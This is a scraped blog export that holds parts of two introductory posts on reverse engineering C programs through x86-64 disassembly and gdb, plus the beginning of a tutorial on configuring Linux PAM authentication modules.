cmp DWORD PTR [rbp-4], 2 je .L3 ; Default jump to the end jmp .L4 .L2: mov DWORD PTR [rbp-8], 10 jmp .L4 .L3: mov DWORD PTR [rbp-8], 20 nop .L4: nop pop rbp ret See\u0026hellip;just like if-else statements, switch-case statements also use cmp and jmp instructions to create branches in the flow.\nGraph diagram for the above disassembly will look something like this\n[Graph: the entry block (push rbp; mov rbp, rsp; mov DWORD PTR [rbp-4], 1; cmp DWORD PTR [rbp-4], 1; je .L2) either jumps to .L2 or falls through to a second comparison (cmp DWORD PTR [rbp-4], 2; je .L3), which either jumps to .L3 or falls through to jmp .L4. Block .L2 runs mov DWORD PTR [rbp-8], 10 and jmp .L4; block .L3 runs mov DWORD PTR [rbp-8], 20 and nop. All paths meet at .L4: nop; pop rbp; ret.]\nWith all that out of the way, let us take a brief look at how function calling works at the low level.\nFunctions I have always wanted to show people an infinite loop built with recursion. So here you have it.\nvoid main() { main(); } Disassembly:-\nmain: push rbp mov rbp, rsp mov eax, 0 call main nop pop rbp ret Each time the call main instruction is encountered, the main() function is called, and a new function frame is created.
Due to the lack of an exit condition, the processor will never be able to read anything beyond the call main instruction, and thus the function will never return. Hence, the infinite loop.\nNow take a look at how things change when we add arguments to a function.\nvoid main() { main(1,2,3,4,5,6,7,8,9,10); } Disassembly:-\nmain: push rbp mov rbp, rsp push 10 push 9 push 8 push 7 mov r9d, 6 mov r8d, 5 mov ecx, 4 mov edx, 3 mov esi, 2 mov edi, 1 mov eax, 0 call main add rsp, 32 nop leave ret If you examine the pattern, you will notice that the arguments are loaded in a particular sequence - from right to left. The first six arguments remain in the registers edi, esi, edx, ecx, r8d \u0026amp; r9d (from left to right). The rest of the arguments are stored on the stack.\nThis pattern is followed by any function that you wish to invoke from your code.\nvoid main() { printf(1,2,3); } Disassembly:-\nmain: push rbp mov rbp, rsp mov edx, 3 mov esi, 2 mov edi, 1 mov eax, 0 call printf nop pop rbp ret This is obviously not the correct method to invoke a printf function. Printf\u0026rsquo;s first argument should be a string (possibly a format string).\nvoid main() { printf(\u0026#34;Hello\u0026#34;); } Disassembly:-\n.LC0: .string \u0026#34;Hello\u0026#34; main: push rbp mov rbp, rsp mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret The Hello string is kept at LC0 offset here. So we load the offset\u0026rsquo;s pointer to value and put it in edi. Then execute the printf() function, which will take as its first argument the value stored in the edi register.\nIf you are wondering what\u0026rsquo;s the point of mov eax, 0 just before printf call\u0026hellip; read this StackOverflow thread 2\nIf we add 1 more argument to printf call, that should be stored in esi register. 
And the right-most argument will be processed first.\nvoid main() { printf(\u0026#34;%d\u0026#34;, 10); } Disassembly:-\n.LC0: .string \u0026#34;%d\u0026#34; main: push rbp mov rbp, rsp mov esi, 10 mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret Printf, like many other C functions, has a return value, and its type is int. Printf returns the number of characters it has printed.\nvoid main() { int x = printf(\u0026#34;%d\\n\u0026#34;, 10); printf(\u0026#34;%d\\n\u0026#34;, x); } Disassembly:-\n.LC0: .string \u0026#34;%d\\n\u0026#34; main: ; Prologue push rbp mov rbp, rsp ; Getting memory block for variables sub rsp, 16 ; first printf mov esi, 10 mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; Storing return value (eax) of printf in the local variable mov DWORD PTR [rbp-4], eax ; second printf mov eax, DWORD PTR [rbp-4] mov esi, eax mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; epilogue nop leave ret Remember how we said that the return values from functions are stored in the eax register? Here also, the return value from printf is stored in eax, which is then stored in a local variable.\nSince both of my strings for printf were exactly the same, the compiler reused the string for the second printf call, instead of creating 2 strings with the same content.\nFunction pointers Let us spice things up a little more now\u0026hellip; and look at function pointers.\nvoid main() { printf(\u0026#34;%p\\n\u0026#34;, main); printf(\u0026#34;%p\\n\u0026#34;, *main); printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;main); } Output of this program is not what you might expect if you are not a seasoned C programmer or have never worked with function pointers before.\nOutput:-\n0x55770bbfa139 0x55770bbfa139 0x55770bbfa139 Each of them gave the same output. This is not the case when working with integer pointers.
Let\u0026rsquo;s see how this looks at lower level\nDisassembly:-\n.LC0: .string \u0026#34;%p\\n\u0026#34; main: push rbp mov rbp, rsp ; printf(\u0026#34;%p\\n\u0026#34;, main); mov esi, OFFSET FLAT:main mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; printf(\u0026#34;%p\\n\u0026#34;, *main); mov esi, OFFSET FLAT:main mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;main); mov esi, OFFSET FLAT:main mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret They are all precisely the same!! The assembly code for all three lines remains unchanged.\nTo test whether it behaves the same way with other functions as well, let\u0026rsquo;s add another function to the code.\n#include \u0026lt;stdio.h\u0026gt; int func() {} void main() { printf(\u0026#34;%p\\n\u0026#34;, func); printf(\u0026#34;%p\\n\u0026#34;, *func); printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;func); } Disassembly:-\nfunc: push rbp mov rbp, rsp nop pop rbp ret .LC0: .string \u0026#34;%p\\n\u0026#34; main: push rbp mov rbp, rsp ; printf(\u0026#34;%p\\n\u0026#34;, func); mov esi, OFFSET FLAT:func mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ; printf(\u0026#34;%p\\n\u0026#34;, *func); mov esi, OFFSET FLAT:func mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf ;printf(\u0026#34;%p\\n\u0026#34;, \u0026amp;func); mov esi, OFFSET FLAT:func mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop pop rbp ret Still the same!!\nIf you have never worked with function pointers before, this is just the beginning of things, we can even call the function func using above pointer notations.\n#include \u0026lt;stdio.h\u0026gt; void func() {} void main() { func(); (*func)(); (\u0026amp;func)(); } Disassembly:-\nfunc: push rbp mov rbp, rsp nop pop rbp ret main: push rbp mov rbp, rsp ; func(); mov eax, 0 call func ; (*func)(); mov eax, 0 call func ; (\u0026amp;func)(); mov eax, 0 call func nop pop rbp ret We can even add arguments to our func function call, just like we do 
with a normal function\u0026hellip; and the first argument will be stored in edi, the second one in esi, and so on.\nint func(int x) { printf(\u0026#34;%d\\n\u0026#34;, x); } void main() { func(5); (func)(6); (*func)(7); (\u0026amp;func)(8); } Disassembly:-\n.LC0: .string \u0026#34;%d\\n\u0026#34; func: push rbp mov rbp, rsp sub rsp, 16 mov DWORD PTR [rbp-4], edi mov eax, DWORD PTR [rbp-4] mov esi, eax mov edi, OFFSET FLAT:.LC0 mov eax, 0 call printf nop leave ret main: push rbp mov rbp, rsp ; func(5); mov edi, 5 call func ; (func)(6); mov edi, 6 call func ; (*func)(7); mov edi, 7 call func ; (\u0026amp;func)(8); mov edi, 8 call func nop pop rbp ret That\u0026rsquo;s it for today. In the next article, I\u0026rsquo;ll try to use all the knowledge we have gathered till now to reverse engineer a very simple calculator program.\nhttps://godbolt.org/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://stackoverflow.com/questions/6212665/why-is-eax-zeroed-before-a-call-to-printf\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/04/intro-to-re-part-3/","summary":"In the previous blog, I discussed some of the basic C program\u0026rsquo;s disassembly structures, concentrating on the variables and their memory layouts. This article, a follow-up to the previous one, focuses on basic operations and functions in C programs.\nIn the previous blogs, we have seen what an empty C program looks like\nvoid main() {} Disassembly:\nmain: push rbp mov rbp, rsp nop pop rbp ret Arithmetic operators Now if we want to work with operations, we\u0026rsquo;ll have to add 2 local variables to the function.","title":"Intro to RE: C : part-3"},{"content":"Reverse engineering is a powerful tool for any software developer. However, as with any tool, it is only as good as the person using it.
Understanding reverse engineering and how to use it is essential for both novices and seasoned developers.\nAccording to wikipedia,\nReverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object; similar to scientific research, the only difference being that scientific research is about a natural phenomenon.\nBecause there will be a lot of new things, I\u0026rsquo;m attempting to keep this article more practical and experimental\u0026hellip;I encourage you to follow along and experiment with your own examples as well.\nThe following is a very simple C program that starts the main() function and exits by returning a value 0.\nint main() { return 0; } This source code will be compiled to create an executable binary file. When we disassemble the compiled binary, we get something like this\u0026hellip;\n(Note: There are many disassemblers 1 you can use. Nearly all the disassembled instructions in this blog were produced with godbolt)\nmain: push rbp mov rbp, rsp mov eax, 0 pop rbp ret In this example, function prologue and epilogue are the first two and last two instructions, respectively. These are used to build a frame for a function. This frame contains all of the local variables used or defined in this function.\nWhenever a function is created, a new frame is created, all the local variables are stored in respective memory blocks inside this frame and finally the frame is discarded when the function returns.\nWe\u0026rsquo;ll go into more detail about this later, but for now, just remember that there are prologue and epilogue instructions that mark the beginning and end of a function.\nWith this out of the picture, the instruction at line 4 appears to be in charge of returning 0 to the caller function (whoever called main()).\nThe idea is to use the eax register as a storage area for return values. 
When a function returns something, it simply stores the value in the eax/rax register so that the caller function can read it later if necessary.\nNow we know some background theory, let\u0026rsquo;s try to change the return value and see how our assembly instructions reflect the change.\nint main(){ return 6; } The assembly instructions for the above code are nearly identical to the previous one, with the exception of the return value at line 4. Now eax register stores the value 6 instead of 0.\nmain: push rbp mov rbp, rsp mov eax, 6 pop rbp ret If you are familiar with basic C programming, you know that we can avoid returning value by changing the return type of the function main() from int to void.\nvoid main() {} No return statements here! So we can safely assume that the disassembly for this function should consist only of a prologue and an epilogue, with no mov eax 0 kind of instructions.\nWhy?? No return statements in the source code, so no need to store anything in eax register. Save some CPU cycles. Makes sense, right? Let\u0026rsquo;s check!!\nmain: push rbp mov rbp, rsp nop pop rbp ret The prologue and epilogue can be seen in the above disassembly, along with a new instruction nop that does nothing. A nop statement in C is a null statement that can be a semicolon (;), an empty block ({}), or any other equivalent statement.\nIf you\u0026rsquo;re a Pythonista, you\u0026rsquo;re already familiar with the pass statement, which has no effect when executed. This serves as a nop in python language.\nIn the disassembly, we now know what the prologue, epilogue, and return statement look like. 
Let’s see what variables look like when disassembled.\nEverything in the following code is identical to the previous example; the only statement added here is an int variable definition.\nvoid main(){ int a = 1; } We have already established that all the local variables for a function are created inside the function frame (which starts with a prologue and ends with an epilogue). With that in mind, let\u0026rsquo;s take a look at the disassembly for this source code.\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 nop pop rbp ret A new instruction detected - mov DWORD PTR [rbp-4], 1. This is storing value 1 at some location pointed by rbp-4. To gain a better understanding of how that works, we\u0026rsquo;ll have to take a detour so that we can debug the binary and see the registers and memory in action.\nI\u0026rsquo;ll start gdb with the compiled version of the above source code, and then disassemble the main function.\n\u0026gt;\u0026gt;\u0026gt; disas main Dump of assembler code for function main: 0x0000555555555119 \u0026lt;+0\u0026gt;: push rbp 0x000055555555511a \u0026lt;+1\u0026gt;: mov rbp,rsp =\u0026gt; 0x000055555555511d \u0026lt;+4\u0026gt;: mov DWORD PTR [rbp-0x4],0x1 0x0000555555555124 \u0026lt;+11\u0026gt;: nop 0x0000555555555125 \u0026lt;+12\u0026gt;: pop rbp 0x0000555555555126 \u0026lt;+13\u0026gt;: ret End of assembler dump. In this scenario, I\u0026rsquo;m at the mov DWORD PTR [rbp-0x4],0x1 instruction. That means, rip register is pointing to this instruction, which means this will be the next instruction executed by the CPU. 
We can also confirm this by checking the value stored in the rip register.\n\u0026gt;\u0026gt;\u0026gt; p/x $rip $1 = 0x55555555511d See, told ya!\nNow, let\u0026rsquo;s print the value of the rbp register to figure out where the 0x1 will eventually be stored.\n\u0026gt;\u0026gt;\u0026gt; p/x $rbp $2 = 0x7fffffffdbd0 \u0026gt;\u0026gt;\u0026gt; p/x $rbp-4 $3 = 0x7fffffffdbcc \u0026gt;\u0026gt;\u0026gt; p/x (int *)($rbp-4) $4 = 0x7fffffffdbcc \u0026gt;\u0026gt;\u0026gt; p/x *(int *)($rbp-4) $5 = 0x7fff The last value is whatever is currently stored at the address rbp-4; nothing has been written there yet, so it is just leftover data. Consider the below diagram to get a clear picture.\n[Diagram: the RBP register holds 0x7fffffffdbd0 and points into MEMORY at (rbp); the slot at (rbp-4), address 0x7fffffffdbcc, currently holds 0x7fff.] The rbp register holds a memory address; subtracting 4 from it gives the start of a slot big enough for an int, and the value is then stored at that address.\nAfter executing the instruction, we\u0026rsquo;ll get 0x1 in this location.\n\u0026gt;\u0026gt;\u0026gt; si \u0026gt;\u0026gt;\u0026gt; disas main Dump of assembler code for function main: 0x0000555555555119 \u0026lt;+0\u0026gt;: push rbp 0x000055555555511a \u0026lt;+1\u0026gt;: mov rbp,rsp 0x000055555555511d \u0026lt;+4\u0026gt;: mov DWORD PTR [rbp-0x4],0x1 =\u0026gt; 0x0000555555555124 
\u0026lt;+11\u0026gt;: nop 0x0000555555555125 \u0026lt;+12\u0026gt;: pop rbp 0x0000555555555126 \u0026lt;+13\u0026gt;: ret End of assembler dump. \u0026gt;\u0026gt;\u0026gt; p/x *(int *)($rbp-4) $7 = 0x1 [Diagram: the RBP register holds 0x7fffffffdbd0 and points into MEMORY at (rbp); the slot at (rbp-4), address 0x7fffffffdbcc, now holds 0x1.] This should give you a little idea of how the references work and where the 0x1 is actually stored.\nWith that off our plate, let\u0026rsquo;s get back to the original instruction in question - mov DWORD PTR [rbp-4], 1. This instruction stores the value 0x1 in the 4 bytes starting at address rbp-4.\nThen there is the same old nop and epilogue. Nothing new here. Let\u0026rsquo;s add more variables to the function.\nvoid main() { int a = 1, b=2, c=3, d=4; int e = 5; } Below is the disassembly for this\nmain: push rbp mov rbp, rsp mov DWORD PTR [rbp-4], 1 mov DWORD PTR [rbp-8], 2 mov DWORD PTR [rbp-12], 3 mov DWORD PTR [rbp-16], 4 mov DWORD PTR [rbp-20], 5 nop pop rbp ret Each variable is created in sequence and gets 4 bytes of space to hold an int. 
Int data types have a size of 4 bytes here, so this makes sense.\nAnother commonly used data type is char, which is smaller than int: 1 byte in total.\nvoid main(){ char a = 1, b=2, c=3, d=4; char e = 5; } Yes, the above program is completely correct from the standpoint of a compiler. When storing data in char types, we don\u0026rsquo;t always need single quotes.\nAnyway, the disassembly for this is as follows:-\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 1 mov BYTE PTR [rbp-2], 2 mov BYTE PTR [rbp-3], 3 mov BYTE PTR [rbp-4], 4 mov BYTE PTR [rbp-5], 5 nop pop rbp ret There is now a noticeable difference between this disassembly and the previous one. The DWORD has been changed to BYTE in this case, which means that less memory is required to store this data, as evidenced by the memory locations used for storage - rbp-1, rbp-2, and so on - each of which is only 1 byte wide.\nFun thing: with the help of some computer maths, we can find out that the highest number a signed 1-byte value can hold is 127 (char is signed with gcc on x86-64). So if we store any number bigger than this, it\u0026rsquo;ll wrap around into the negative range: 128 becomes -128, 129 becomes -127, and so on.\nvoid main(){ char a = 127; char b = 128; char c = 129; char d = 130; } disassembly for this code:-\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], -127 mov BYTE PTR [rbp-4], -126 nop pop rbp ret Good, now we also know how int and char look in their disassembly output. Let\u0026rsquo;s mix things up a bit to level up and learn something new.\nvoid main(){ char a = 127; char b = 128; char c = 129; char d = 130; int e = 131; } 4 char and then 1 int.\nrbp-1 for a. rbp-2 for b. rbp-3 for c. rbp-4 for d. rbp-8 for e, because int takes 4 bytes (this can depend on the OS, architecture and compiler you are using). 
Let\u0026rsquo;s check the disassembly to see if we got this right or not.\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], -127 mov BYTE PTR [rbp-4], -126 mov DWORD PTR [rbp-8], 131 nop pop rbp ret Woohooo!!\nThough there is one thing I want you to notice\u0026hellip; The int value did not follow the same pattern as the char values, because a char is only 1 byte and cannot hold a value above 127, whereas an int is 4 bytes and can hold the assigned value without any trouble. As a result, the int value remained unchanged from the source code, while the char values became negative.\nNow, let\u0026rsquo;s change the order of the variables and see how it gets interesting.\nvoid main(){ char a = 127; char b = 128; int e = 131; char c = 129; char d = 130; } disassembly for this code:-\nmain: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov DWORD PTR [rbp-8], 131 mov BYTE PTR [rbp-9], -127 mov BYTE PTR [rbp-10], -126 nop pop rbp ret Well, you can see that the offsets have changed: e now sits at rbp-8 even though only 2 bytes are used before it. It\u0026rsquo;s time to be aware of a concept called Data structure alignment.\nAccording to wikipedia,\nThe CPU in modern computer hardware performs reads and writes to memory most efficiently when the data is naturally aligned, which generally means that the data\u0026rsquo;s memory address is a multiple of the data size. For instance, in a 32-bit architecture, the data may be aligned if the data is stored in four consecutive bytes and the first byte lies on a 4-byte boundary.\nRead this article 2 to gain a better understanding of data alignment and why it even matters to us.\nFor now, just know that an int is normally aligned to a 4-byte boundary because the CPU has a native 4-byte load. 
That means, it can pick up 4 bytes in a single turn and use them for something.\nLet\u0026rsquo;s visualize the memory layout for the variables in above code.\n[Diagram: memory drawn as rows of 4 bytes, one row per load; row 1 holds 127 and -128 followed by two unused bytes, row 2 holds 131, row 3 holds -127 and -126.] The above diagram of memory is laid out in rows of 4 bytes, one row per load. The first 2 variables are of BYTE type, so their values are placed in the first 2 blocks of the first row. The next variable is an int, which takes 4 bytes. But there are not 4 bytes left in the first row, so, to keep it readable in a single load, this variable was stored in the next row.\nSo does it mean that we have that 2 bytes space just lying there?? - YES! you can use it if you want. 
Take a look at the below source code.\nvoid main(){ char a = 127; char b = 128; char x = 111; char y = 112; int e = 131; char c = 129; char d = 130; } main: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], 111 mov BYTE PTR [rbp-4], 112 mov DWORD PTR [rbp-8], 131 mov BYTE PTR [rbp-9], -127 mov BYTE PTR [rbp-10], -126 nop pop rbp ret No change in the layout\u0026hellip; variables x and y fill up the 2 bytes of space that were just lying there to be used.\nBut if we add 1 more variable Z, then the whole thing moves.\nvoid main(){ char a = 127; char b = 128; char x = 111; char y = 112; char Z = 123; int e = 131; char c = 129; char d = 130; } main: push rbp mov rbp, rsp mov BYTE PTR [rbp-1], 127 mov BYTE PTR [rbp-2], -128 mov BYTE PTR [rbp-3], 111 mov BYTE PTR [rbp-4], 112 mov BYTE PTR [rbp-5], 123 mov DWORD PTR [rbp-12], 131 mov BYTE PTR [rbp-13], -127 mov BYTE PTR [rbp-14], -126 nop pop rbp ret If you are still visualizing the way I displayed above, we now have 3 bytes of unused space in row 2. This space is added by the compiler and is termed padding. We cannot always avoid padding, but a good programmer can arrange the variables in a way that minimizes it.\nThat was a long detour, but definitely worth it. I\u0026rsquo;ll cover more examples in later parts of this series. Till then, ciao!!\nhttps://en.wikipedia.org/wiki/Disassembler#Examples_of_disassemblers\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://developer.ibm.com/articles/pa-dalign/\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2023/03/intro-to-re-part-2/","summary":"Reverse engineering is a powerful tool for any software developer. However, as with any tool, it is only as good as the person using it. 
Understanding reverse engineering and how to use it is essential for both novices and seasoned developers.\nAccording to wikipedia,\nReverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object; similar to scientific research, the only difference being that scientific research is about a natural phenomenon.","title":"Intro to RE: C : part-2"},{"content":"PAM - What and Why Authenticating a user to a service used to be a time-consuming process. The application had to be aware of all possible authentication mechanisms and had to be rebuilt every time a new authentication method was introduced\u0026hellip; As a result, there was a significant amount of code repetition. Naturally, it was disliked by everyone!!\nAs a result, the concept of a middle-ware application responsible for user authentication to a service arose. And, Pluggable Authentication Modules (PAM), a collection of modules that act as a barrier between a service on your system and the service\u0026rsquo;s user, were created.\nModules can include a variety of functions, such as disabling login for specific users/groups, limiting resources, auditing, and so on. PAM is now supported by the vast majority of major unix flavours, including AIX, HP-UX, FreeBSD, and nearly all Linux distributions.\nThe big advantage here is that security is no longer a concern for the application: if PAM says \u0026ldquo;it\u0026rsquo;s OK\u0026rdquo;, it\u0026rsquo;s OK. That simplifies things for both the application developer and the system administrator.\nUnderstanding PAM According to man 8 pam,\nLinux-PAM is a system of libraries that handle the authentication tasks of applications (services) on the system. 
The library provides a stable general interface (Application Programming Interface - API) that privilege granting programs (such as login(1) and su(1)) defer to to perform standard authentication tasks.\nThese libraries are typically configurable via defined arguments or dedicated configuration files. The internal behaviour of the Linux-PAM library is mostly irrelevant from the standpoint of a sysadmin. The key point is to define the relationship between applications and PAM.\nThe below diagram gives an idea of how PAM works.\n[Diagram: APP 1, APP 2 and APP 3 all talk to PAM, which uses modules such as pam_unix.so (backed by /etc/passwd and /etc/shadow), pam_ldap.so (backed by LDAP), pam_tty_audit and other libraries.] Assume the user attempts to log into APP 1, which asks PAM whether the user is authenticated and authorised. If the query is successful, PAM returns the status code PAM_SUCCESS; otherwise, it returns one of the other relevant codes. 
The complete list of return codes and their meanings can be found in their github repository, which can be found here. 1\nConfiguring PAM PAM\u0026rsquo;s main feature is the module configuration it offers. PAM looks at these text configuration files to determine what security actions to take for an application, and the administrator can add or remove new rules at any time. PAM is also extensible, which means that if we want to add new features (such as 2FA/MFA), we only need to change a few files and login can now use them.\nIn RedHat based systems, all of the pam config files can be easily located with the below command.\n$ rpm -ql pam | grep /etc /etc/pam.d /etc/pam.d/config-util /etc/pam.d/fingerprint-auth /etc/pam.d/other /etc/pam.d/password-auth /etc/pam.d/postlogin /etc/pam.d/smartcard-auth /etc/pam.d/system-auth /etc/security /etc/security/access.conf /etc/security/chroot.conf /etc/security/console.apps /etc/security/console.handlers /etc/security/console.perms /etc/security/console.perms.d /etc/security/group.conf /etc/security/limits.conf /etc/security/limits.d /etc/security/limits.d/20-nproc.conf /etc/security/namespace.conf /etc/security/namespace.d /etc/security/namespace.init /etc/security/opasswd /etc/security/pam_env.conf /etc/security/sepermit.conf /etc/security/time.conf There are two main directories here: /etc/pam.d and /etc/security. Both of these directories play important roles in configuring PAM behaviour.\nEach file in the /etc/pam.d folder contains rules that are read by PAM at runtime. If the user attempts to login via ssh, he must be authenticated. PAM checks rules from the sshd file in the /etc/pam.d/ folder after sshd sends an authentication request to PAM. If the file is present, the file\u0026rsquo;s rules are read and a proper response is returned to the application. 
If the file is missing, the default behaviour is to read the rules from other file in same directory and act on them.\nLet\u0026rsquo;s take a look at /etc/pam.d/ folder to get better picture of what\u0026rsquo;s in it.\n$ ls -l /etc/pam.d -rw-r--r--. 1 root root 192 Feb 2 2021 chfn -rw-r--r--. 1 root root 192 Feb 2 2021 chsh -rw-r--r--. 1 root root 232 Apr 1 2020 config-util -rw-r--r--. 1 root root 287 Jan 13 2022 crond lrwxrwxrwx. 1 root root 19 Nov 18 13:01 fingerprint-auth -\u0026gt; fingerprint-auth-ac -rw-r--r--. 1 root root 702 Nov 18 13:01 fingerprint-auth-ac -rw-r--r--. 1 root root 796 Feb 2 2021 login -rw-r--r--. 1 root root 154 Apr 1 2020 other -rw-r--r--. 1 root root 188 Apr 1 2020 passwd lrwxrwxrwx. 1 root root 16 Nov 18 13:01 password-auth -\u0026gt; password-auth-ac -rw-r--r--. 1 root root 1033 Nov 18 13:01 password-auth-ac -rw-r--r--. 1 root root 155 Jan 25 2022 polkit-1 lrwxrwxrwx. 1 root root 12 Nov 18 13:01 postlogin -\u0026gt; postlogin-ac -rw-r--r--. 1 root root 330 Nov 18 13:01 postlogin-ac -rw-r--r--. 1 root root 681 Feb 2 2021 remote -rw-r--r--. 1 root root 143 Feb 2 2021 runuser -rw-r--r--. 1 root root 138 Feb 2 2021 runuser-l lrwxrwxrwx. 1 root root 17 Nov 18 13:01 smartcard-auth -\u0026gt; smartcard-auth-ac -rw-r--r--. 1 root root 752 Nov 18 13:01 smartcard-auth-ac lrwxrwxrwx. 1 root root 25 Nov 18 12:57 smtp -\u0026gt; /etc/alternatives/mta-pam -rw-r--r--. 1 root root 76 Apr 1 2020 smtp.postfix -rw-r--r--. 1 root root 904 Nov 24 2021 sshd -rw-r--r--. 1 root root 540 Feb 2 2021 su -rw-r--r--. 1 root root 200 Oct 14 2021 sudo -rw-r--r--. 1 root root 178 Oct 14 2021 sudo-i -rw-r--r--. 1 root root 137 Feb 2 2021 su-l lrwxrwxrwx. 1 root root 14 Nov 18 13:01 system-auth -\u0026gt; system-auth-ac -rw-r--r--. 1 root root 1031 Nov 18 13:01 system-auth-ac -rw-r--r--. 1 root root 129 Sep 1 14:57 systemd-user -rw-r--r--. 1 root root 84 Nov 24 2021 vlock There are more files than what the rpm command above revealed. 
The reason for this is straightforward: we examined files installed by the pam package itself. Other files are installed by the packages that they belong to. The openssh-server package, for example, installed the sshd file.\n$ rpm -qf /etc/pam.d/sshd openssh-server-7.4p1-22.el7_9.x86_64 We now know that pam has rule files for each application as well as a default other file for all applications that do not have dedicated rule files. We won\u0026rsquo;t always need this, but it\u0026rsquo;s a good idea to keep it in the back of our minds.\nLet\u0026rsquo;s take a closer look at these rules from the sshd file.\n$ cat /etc/pam.d/sshd #%PAM-1.0 auth\trequired\tpam_sepermit.so auth substack password-auth auth include postlogin # Used with polkit to reauthorize users in remote sessions -auth optional pam_reauthorize.so prepare account required pam_nologin.so account include password-auth password include password-auth # pam_selinux.so close should be the first session rule session required pam_selinux.so close session required pam_loginuid.so # pam_selinux.so open should only be followed by sessions to be executed in the user context session required pam_selinux.so open env_params session required pam_namespace.so session optional pam_keyinit.so force revoke session include password-auth session include postlogin # Used with polkit to reauthorize users in remote sessions -session optional pam_reauthorize.so prepare Lines beginning with # are clearly identified as comments, while the rest of the lines contain a single rule in a line.\nEach rule follows a similar structure but uses different keywords. The generic rule syntax looks like this:\ntype control module [modules arguments] There are 4 types of type in the PAM rules file.\nauth : rules for authentication. account : rules for account management, like expired passwords and allowed time of login. password : rules for password management, like checking password quality. 
These rules are only used when applications are changing the password used for auth. session : rules for session management. They typically run at the start or end of the session. And there are 6 common types of control:\nrequired : if it fails, the whole stack fails, but the remaining modules are still run; if it passes, go to next. sufficient : if it passes (and no earlier required module failed), the stack passes immediately; if it fails, go to next. requisite : same as required, but returns to the application immediately on failure. optional : pam ignores it (pass or fail); if this is the only module in the stack then it decides if fail or pass. include : include rules from other pam files. if the stack fails, return control to the application. substack : works like include. but if the substack fails, return to the parent stack instead of giving control back to the application. The module (and its arguments, if any) follows. By default, PAM will look for modules in the /usr/lib64/security directory, but you can override this behaviour by specifying the absolute path of the module. Some modules rely on external configuration files, which can be found in the /etc/security directory.\nFew common modules Before delving into the actual PAM rules files, we should first understand how a few of the most common modules behave. This will make interpreting the rules from the rules file much easier.\npam_succeed_if.so This module is designed to succeed or fail auth based on the characteristics of the user trying to log in and the arguments passed to the module. This module returns success if, and only if, all the arguments passed to it match the characteristics of the user trying to log in.\npam_selinux.so This module sets the appropriate selinux security context. This can be used to set the context when a session starts and restore it afterwards.\npam_permit.so This is the simplest of all. It just permits access and does nothing else. 
With that said, you should consider this module very dangerous in the wrong hands.\npam_limits.so As its name suggests, this module sets the limits on the system resources for a user-session. The root user (uid=0) is also affected by this module.\nThere are many limits that can be configured, so there is a dedicated folder to host configuration files for it - /etc/security/limits.d. Alternatively, there is a /etc/security/limits.conf file. But it\u0026rsquo;s a good practice to have separate config files if possible.\npam_pwquality.so This module was developed by RedHat. The only action of this module is to prompt the user for the password and check its strength. To check its strength, the module uses a dictionary (of weak passwords) to see if the entered password is part of it. If the password is not in the list, then that password is checked against a set of rules defined by the admin.\nThese rules are configurable either by the use of module arguments or the /etc/security/pwquality.conf config file.\npam_rootok.so This module authenticates the user if the real uid is 0. No questions asked!\nIf you don\u0026rsquo;t know what real and effective UIDs are, read this 2.\npam_faildelay.so This module sets the delay on failure. For example, when a user types a wrong password, it fails and the next prompt is delayed by this module. If the delay is not given, then it will use FAIL_DELAY from /etc/login.defs.\npam_unix.so This is the standard unix authentication module. Usually it uses /etc/passwd and /etc/shadow (if shadow is enabled) to authenticate the user. There are many tasks that can be performed by this module, like checking the expiry or last change of the password.\nThe session component of this module logs when a user logs in to or out of the system.\npam_deny.so Just like pam_permit.so, this module is very simple and straightforward. It denies access to everybody.\npam_warn.so This module logs the service, terminal, user, or anything to syslog. 
This module always returns PAM_IGNORE, so it just logs events and takes no other part in the authentication process.\nWe\u0026rsquo;re almost there now. Before we go any further, there are a few more things we should consider:\nPAM rules are parsed from top to bottom. If a sufficient rule passes, then none of the rules below it will be checked.\nSome of the rules start with - character, indicating that PAM should ignore them silently if the module is missing.\nIf you want to know anything about a module, there is usually a man page available. The majority of the manpages for these modules provide examples of usage and return types.\nMaking changes to PAM files has immediate effect. You do not need to restart. As a result, it\u0026rsquo;s a good idea to keep a backup of the files before making any changes.\nAny error in the PAM files has the potential to lock you out of your system permanently. Keeping a live root shell while testing is therefore beneficial. If you made a mistake, you can undo your changes using this shell.\nUsecases enforcing strong passwords Let\u0026rsquo;s apply everything we\u0026rsquo;ve learned so far to observe how PAM responds to password changes made with the passwd utility.\nWe now know that the /etc/pam.d/passwd file will be used by passwd (if it exists; else, /etc/pam.d/other will be read). This file will provide the procedures to be followed when passwd is used for any type of authentication and authorization.\nThis makes it obvious for us to go and check out the /etc/pam.d/passwd file\u0026hellip;\n$ cat /etc/pam.d/passwd #%PAM-1.0 auth include\tsystem-auth account include\tsystem-auth password substack\tsystem-auth -password optional\tpam_gnome_keyring.so use_authtok password substack\tpostlogin Analysing this file tells us that it includes the system-auth rules file. 
